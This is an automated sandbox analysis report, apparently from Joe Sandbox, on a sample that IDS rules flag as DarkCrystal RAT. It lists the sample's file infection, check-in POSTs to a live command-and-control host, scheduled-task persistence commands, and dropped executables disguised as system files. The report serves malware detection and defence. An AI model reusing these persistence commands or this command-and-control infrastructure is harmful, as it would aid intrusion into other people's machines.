                              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.pdb source: 4ra1Fo2Zql.exe, 00000000.00000002.2060132531.0000000002A6C000.00000004.00000800.00020000.00000000.sdmp

                              Spreading

                              barindex
                              Infects executable files (exe, dll, sys, html)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49717 -> 80.211.144.156:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49715 -> 80.211.144.156:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49713 -> 80.211.144.156:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49719 -> 80.211.144.156:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49720 -> 80.211.144.156:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49712 -> 80.211.144.156:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49722 -> 80.211.144.156:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49721 -> 80.211.144.156:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49704 -> 80.211.144.156:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49716 -> 80.211.144.156:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49718 -> 80.211.144.156:80
                              Uses ping.exe to check the status of other devices and networks
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: Joe Sandbox ViewIP Address: 80.211.144.156 80.211.144.156
                              Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
                              Source: global trafficHTTP traffic detected: POST /UpdatelinuxWindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 621287cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /UpdatelinuxWindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 621287cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /UpdatelinuxWindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 621287cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /UpdatelinuxWindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 621287cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /UpdatelinuxWindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 621287cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /UpdatelinuxWindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 621287cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /UpdatelinuxWindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 621287cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /UpdatelinuxWindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 621287cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /UpdatelinuxWindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 621287cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /UpdatelinuxWindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 621287cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /UpdatelinuxWindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 621287cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficDNS traffic detected: DNS query: 621287cm.n9shteam2.top
                              Source: unknownHTTP traffic detected: POST /UpdatelinuxWindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 621287cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 29 Aug 2024 21:02:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13Connection: keep-aliveData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 29 Aug 2024 21:02:36 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13Connection: keep-aliveData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 29 Aug 2024 21:02:44 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13Connection: keep-aliveData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 29 Aug 2024 21:02:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13Connection: keep-aliveData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 29 Aug 2024 21:02:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13Connection: keep-aliveData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 29 Aug 2024 21:03:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13Connection: keep-aliveData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 29 Aug 2024 21:03:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13Connection: keep-aliveData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 29 Aug 2024 21:03:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13Connection: keep-aliveData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 29 Aug 2024 21:03:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13Connection: keep-aliveData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 29 Aug 2024 21:03:46 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13Connection: keep-aliveData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 29 Aug 2024 21:03:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13Connection: keep-aliveData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
                              Source: GrVEPTmsoNTbY.exe, 0000000A.00000002.2186917152.0000000002F93000.00000004.00000800.00020000.00000000.sdmp, GrVEPTmsoNTbY.exe, 0000000A.00000002.2186917152.0000000002DCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://621287cm.n9shteam2.top
                              Source: GrVEPTmsoNTbY.exe, 0000000A.00000002.2186917152.0000000002DCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://621287cm.n9shteam2.top/
                              Source: GrVEPTmsoNTbY.exe, 0000000A.00000002.2186917152.0000000002DCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://621287cm.n9shteam2.top/UpdatelinuxWindowsUniversal.php
                              Source: 4ra1Fo2Zql.exe, 00000000.00000002.2060132531.0000000002A6C000.00000004.00000800.00020000.00000000.sdmp, GrVEPTmsoNTbY.exe, 0000000A.00000002.2186917152.0000000002DCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC1FF918B0E6FF4E65A25AACD427A2AFF8.TMPJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC1FF918B0E6FF4E65A25AACD427A2AFF8.TMPJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeCode function: 0_2_00007FF848E60D480_2_00007FF848E60D48
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeCode function: 0_2_00007FF848E60E430_2_00007FF848E60E43
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeCode function: 10_2_00007FF848E80D4810_2_00007FF848E80D48
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeCode function: 10_2_00007FF848E80E4310_2_00007FF848E80E43
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeCode function: 11_2_00007FF848E9163511_2_00007FF848E91635
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeCode function: 11_2_00007FF848E712B211_2_00007FF848E712B2
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeCode function: 11_2_00007FF848E60D4811_2_00007FF848E60D48
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeCode function: 11_2_00007FF848E60E4311_2_00007FF848E60E43
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeCode function: 28_2_00007FF848E50D4828_2_00007FF848E50D48
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeCode function: 28_2_00007FF848E50E4328_2_00007FF848E50E43
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeCode function: 31_2_00007FF848E90D4831_2_00007FF848E90D48
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeCode function: 31_2_00007FF848E90E4331_2_00007FF848E90E43
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeCode function: 32_2_00007FF848E612B232_2_00007FF848E612B2
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeCode function: 32_2_00007FF848E8160132_2_00007FF848E81601
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeCode function: 32_2_00007FF848E50D4832_2_00007FF848E50D48
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeCode function: 32_2_00007FF848E50E4332_2_00007FF848E50E43
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeCode function: 34_2_00007FF848E80D4834_2_00007FF848E80D48
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeCode function: 34_2_00007FF848E80E4334_2_00007FF848E80E43
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeCode function: 34_2_00007FF848EB163534_2_00007FF848EB1635
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeCode function: 34_2_00007FF848E914BB34_2_00007FF848E914BB
                              Source: C:\Users\user\RuntimeBroker.exeCode function: 35_2_00007FF848EC163535_2_00007FF848EC1635
                              Source: C:\Users\user\RuntimeBroker.exeCode function: 35_2_00007FF848EC160135_2_00007FF848EC1601
                              Source: C:\Users\user\RuntimeBroker.exeCode function: 35_2_00007FF848EA12B235_2_00007FF848EA12B2
                              Source: C:\Users\user\RuntimeBroker.exeCode function: 35_2_00007FF848E90D4835_2_00007FF848E90D48
                              Source: C:\Users\user\RuntimeBroker.exeCode function: 35_2_00007FF848E90E4335_2_00007FF848E90E43
                              Source: C:\Users\user\RuntimeBroker.exeCode function: 37_2_00007FF848E912B237_2_00007FF848E912B2
                              Source: C:\Users\user\RuntimeBroker.exeCode function: 37_2_00007FF848E80D4837_2_00007FF848E80D48
                              Source: C:\Users\user\RuntimeBroker.exeCode function: 37_2_00007FF848E80E4337_2_00007FF848E80E43
                              Source: C:\Users\user\RuntimeBroker.exeCode function: 37_2_00007FF848EB163537_2_00007FF848EB1635
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeCode function: 38_2_00007FF848E60D4838_2_00007FF848E60D48
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeCode function: 38_2_00007FF848E60E4338_2_00007FF848E60E43
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeCode function: 38_2_00007FF848E712B238_2_00007FF848E712B2
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeCode function: 38_2_00007FF848E9163538_2_00007FF848E91635
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeCode function: 39_2_00007FF848E80D4839_2_00007FF848E80D48
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeCode function: 39_2_00007FF848E80E4339_2_00007FF848E80E43
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeCode function: 39_2_00007FF848EB163539_2_00007FF848EB1635
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeCode function: 39_2_00007FF848E914BB39_2_00007FF848E914BB
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeCode function: 45_2_00007FF848E9163545_2_00007FF848E91635
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeCode function: 45_2_00007FF848E714BB45_2_00007FF848E714BB
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeCode function: 45_2_00007FF848E60D4845_2_00007FF848E60D48
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeCode function: 45_2_00007FF848E60E4345_2_00007FF848E60E43
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\CAgBdTQY.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                              Source: 4ra1Fo2Zql.exe, 00000000.00000002.2085769625.000000001B7E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs 4ra1Fo2Zql.exe
                              Source: 4ra1Fo2Zql.exe, 00000000.00000000.1995307367.0000000000032000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4ra1Fo2Zql.exe
                              Source: 4ra1Fo2Zql.exe, 00000000.00000002.2080353775.000000001B7B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs 4ra1Fo2Zql.exe
                              Source: 4ra1Fo2Zql.exe, 0000001C.00000002.2230154294.0000000002610000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4ra1Fo2Zql.exe
                              Source: 4ra1Fo2Zql.exe, 0000001F.00000002.2263574639.00000000031AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4ra1Fo2Zql.exe
                              Source: 4ra1Fo2Zql.exe, 0000001F.00000002.2263574639.00000000031A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4ra1Fo2Zql.exe
                              Source: 4ra1Fo2Zql.exe, 0000001F.00000002.2263574639.000000000325A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4ra1Fo2Zql.exe
                              Source: 4ra1Fo2Zql.exe, 0000001F.00000002.2263574639.0000000003190000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4ra1Fo2Zql.exe
                              Source: 4ra1Fo2Zql.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4ra1Fo2Zql.exe
                              Source: 4ra1Fo2Zql.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              Source: 4ra1Fo2Zql.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: RuntimeBroker.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: GrVEPTmsoNTbY.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: csrss.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: GrVEPTmsoNTbY.exe0.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: 4ra1Fo2Zql.exe, YJ0nwytrtfFSElJEkGn.csCryptographic APIs: 'CreateDecryptor'
                              Source: 4ra1Fo2Zql.exe, YJ0nwytrtfFSElJEkGn.csCryptographic APIs: 'CreateDecryptor'
                              Source: 4ra1Fo2Zql.exe, YJ0nwytrtfFSElJEkGn.csCryptographic APIs: 'CreateDecryptor'
                              Source: 4ra1Fo2Zql.exe, YJ0nwytrtfFSElJEkGn.csCryptographic APIs: 'CreateDecryptor'
                              Source: 4ra1Fo2Zql.exe, 00000000.00000002.2058962549.00000000006FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.VBP
                              Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@54/48@1/1
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile created: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile created: C:\Users\user\Desktop\xxMkqOtN.logJump to behavior
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-ln07BHafEPq82yTj5rEF
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7860:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6332:120:WilError_03
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile created: C:\Users\user\AppData\Local\Temp\q4lxag2sJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\IZdub348jc.bat"
                              Source: 4ra1Fo2Zql.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: 4ra1Fo2Zql.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile read: C:\Users\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: 4ra1Fo2Zql.exeReversingLabs: Detection: 65%
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile read: C:\Users\user\Desktop\4ra1Fo2Zql.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\4ra1Fo2Zql.exe "C:\Users\user\Desktop\4ra1Fo2Zql.exe"
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe'" /f
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "GrVEPTmsoNTbY" /sc ONLOGON /tr "'C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.cmdline"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2144.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCFABAA3A3EFF44E7388BEDB3353C25726.TMP"
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00tp5zly\00tp5zly.cmdline"
